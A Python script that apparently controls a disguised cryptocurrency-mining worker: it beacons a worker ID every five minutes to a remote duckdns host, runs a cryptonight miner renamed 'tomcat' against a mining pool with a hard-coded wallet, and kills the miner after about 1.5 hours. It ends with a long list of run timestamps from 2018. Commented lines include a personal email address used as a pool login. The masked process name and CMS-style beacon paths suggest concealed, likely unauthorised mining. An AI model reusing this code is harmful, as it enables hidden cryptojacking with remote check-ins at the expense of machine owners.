import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:04.944268
#2018-02-17 16:30:09.118992
#2018-02-17 18:18:06.385332
#2018-02-17 20:06:05.424735
#2018-02-17 21:53:01.318058
#2018-02-17 23:38:03.991867
#2018-02-18 01:27:08.275915
#2018-02-18 03:14:05.310919
#2018-02-18 05:02:04.325380
#2018-02-18 06:55:05.380841
#2018-02-18 08:43:03.807700
#2018-02-18 10:29:06.956647
#2018-02-18 12:15:07.113121
#2018-02-18 14:02:03.915291
#2018-02-18 15:52:04.248027
#2018-02-18 17:42:02.035706
#2018-02-18 19:29:06.890327
#2018-02-18 21:14:03.553226
#2018-02-18 23:02:01.544651
#2018-02-19 00:49:01.991073
#2018-02-19 02:36:07.722539
#2018-02-19 04:22:06.606953
#2018-02-19 06:08:06.804564
#2018-02-19 07:56:05.341943
#2018-02-19 09:47:05.684953
#2018-02-19 11:37:01.380850
#2018-02-19 13:24:03.986734
#2018-02-19 15:12:01.306020
#2018-02-19 17:02:04.789340
#2018-02-19 18:48:08.664715
#2018-02-19 20:39:04.353743
#2018-02-19 22:26:06.574029
#2018-02-20 00:14:01.306563
#2018-02-20 02:02:06.484965
#2018-02-20 03:52:05.348655
#2018-02-20 05:37:07.117897
#2018-02-20 07:22:04.539684
#2018-02-20 09:07:05.239990
#2018-02-20 10:50:03.227342
#2018-02-20 12:37:02.171851
#2018-02-20 14:22:01.258244
#2018-02-20 16:07:08.716911
#2018-02-20 17:53:06.609415
#2018-02-20 19:44:06.359002
#2018-02-20 21:33:06.795752
#2018-02-20 23:17:06.075342
#2018-02-21 01:01:04.026452
#2018-02-21 02:47:05.354633
#2018-02-21 04:35:03.495433
#2018-02-21 06:23:04.605499
#2018-02-21 08:08:01.945746
#2018-02-21 09:54:01.885025
#2018-02-21 11:42:08.730759
#2018-02-21 13:32:05.638844
#2018-02-21 15:18:08.117841
#2018-02-21 17:10:03.025455
#2018-02-21 18:57:09.559446
#2018-02-21 20:45:06.560706
#2018-02-21 22:29:05.791828
#2018-02-22 00:18:07.665717
#2018-02-22 02:07:05.007713
#2018-02-22 03:53:05.424589
#2018-02-22 05:40:09.788014
#2018-02-22 07:25:08.132756
#2018-02-22 09:13:01.343503
#2018-02-22 11:01:04.264701
#2018-02-22 12:47:01.708734
#2018-02-22 14:32:06.142516
#2018-02-22 16:18:06.636715
#2018-02-22 18:04:08.817890
#2018-02-22 19:52:07.895692
#2018-02-22 21:40:09.816737
#2018-02-22 23:26:08.146914
#2018-02-23 01:13:06.669671
#2018-02-23 03:02:01.840501
#2018-02-23 04:48:06.678344
#2018-02-23 06:35:07.519152
#2018-02-23 08:23:04.120322
#2018-02-23 10:38:09.167023
#2018-02-23 12:32:03.226281
#2018-02-23 14:19:01.830559
#2018-02-23 16:11:06.849056
#2018-02-23 17:57:09.583802
#2018-02-23 19:44:07.672002
#2018-02-23 21:27:01.971251
#2018-02-23 23:14:05.964265
#2018-02-24 00:58:06.123154
#2018-02-24 02:52:02.262288
#2018-02-24 04:40:01.845610
#2018-02-24 06:24:05.602411
#2018-02-24 08:12:05.211254
#2018-02-24 09:57:07.089000
#2018-02-24 11:56:07.538445
#2018-02-24 13:45:07.737152
#2018-02-24 15:41:06.034626
#2018-02-24 17:34:03.855814
#2018-02-24 19:20:08.641020
#2018-02-24 21:10:09.054120
#2018-02-24 23:43:06.434556
#2018-02-25 03:37:07.018267
#2018-02-25 06:21:04.367323
#2018-02-25 11:34:04.256969
#2018-02-25 13:14:01.957736
#2018-02-25 14:47:01.693873
#2018-02-25 16:20:03.961837